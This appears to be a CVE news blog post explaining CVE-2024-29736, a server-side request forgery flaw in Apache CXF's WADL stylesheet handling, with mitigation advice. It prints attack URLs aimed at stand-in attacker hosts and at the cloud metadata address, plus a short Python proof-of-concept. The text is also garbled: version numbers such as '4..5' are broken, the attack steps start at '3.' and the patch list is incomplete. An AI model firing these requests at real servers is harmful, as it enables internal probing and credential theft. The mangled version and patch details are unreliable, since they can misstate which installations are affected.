CVE CyberSecurity Database News

CVE-2024-29736 - SSRF in Apache CXF WADL Service Description Explained

Poster -

Summary:
A new security vulnerability, CVE-2024-29736, has been identified in Apache CXF—a popular Java-based web services framework. Versions before 4..5, 3.6.4, and 3.5.9 contain a bug in the WADL (Web Application Description Language) service description endpoint that allows a Server-Side Request Forgery (SSRF) attack. This article breaks down how this flaw works, shows example code, and explains when an application is at risk.

What is SSRF, and Why Does it Matter?

Server-Side Request Forgery (SSRF) lets an attacker make the server send HTTP requests to internal or external resources, often bypassing firewalls. SSRF can be abused to probe internal networks or access secret metadata endpoints (like cloud provider APIs).

The Vulnerability: Where Is It?

Apache CXF provides a WADL endpoint for describing REST APIs. The problem is with an optional "stylesheet" parameter—when a custom stylesheet is configured, CXF fetches the file from a given path. If untrusted input is used, an attacker can trick the server into fetching files or making HTTP requests to URLs they control.

This only happens if you configure CXF's WADL generator to use user-defined stylesheets.

> If your application does not use custom WADL stylesheets, you are not affected by this issue.

Suppose your application exposes the WADL at

http://your-server/api?_wadl

With the vulnerable setup, you can request

http://your-server/api?_wadl&stylesheet=http://evil.com/mystyle.xsl

The backend server will fetch the XSL stylesheet from the untrusted URL, completing a server-side HTTP request.

Example Java Code (Vulnerable Pattern)

// CXF WadlGenerator setup, simplified.
public class CustomWadlGenerator {
    public void setStylesheet(String stylesheetUrl) {
        // BAD: Accepts any URL from the user!
        this.stylesheetUrl = stylesheetUrl;
    }
}

// Omitted: request handling code that uses the user-supplied 'stylesheet' param

If an attacker passes a URL like http://169.254.169.254/latest/meta-data/ they could steal sensitive cloud data!

`

https://victim.com/rest?_wadl&stylesheet=http://evil.com/evil.xsl

The server fetches evil.xsl from attacker's site.

3. Attacker observes the request, learns internal network structure, or captures data if more is fetched.

> Even more dangerous: If your server can reach AWS, GCP, or other internal metadata endpoints, the attacker can leverage this to extract credentials.

Here's a simple Python script that demonstrates the attack

import requests

# Change these values appropriately!
victim_api_url = "http://target-server/api";
evil_stylesheet_url = "http://evil-attacker.com/my.xsl";

# SSRF exploit request
exploit_url = f"{victim_api_url}?_wadl&stylesheet={evil_stylesheet_url}"
response = requests.get(exploit_url)
print(response.text)

This will make the target server try to fetch the malicious stylesheet.

Am I Vulnerable?

- Vulnerable: Using Apache CXF versions 3.5.x before 3.5.9, 3.6.x before 3.6.4, or 4..x before 4..5 AND using custom WADL stylesheets.

Not vulnerable: Not using custom stylesheets, OR upgraded to a fixed version.

## Patch / Mitigation

3.5.9 or later

See official advisory:
- CXF Security Advisory: CVE-2024-29736

References

- NVD entry for CVE-2024-29736
- CXF Security Advisory
- Apache CXF Homepage

Conclusion

CVE-2024-29736 is a classic example of how a seemingly minor feature (custom stylesheets in WADL) can lead to serious SSRF bugs. If you use Apache CXF to expose REST APIs and allow users to define or override stylesheets in WADL, patch your system and audit your endpoints now.

Timeline

Published on: 07/19/2024 09:15:04 UTC
Last modified on: 08/22/2024 17:31:48 UTC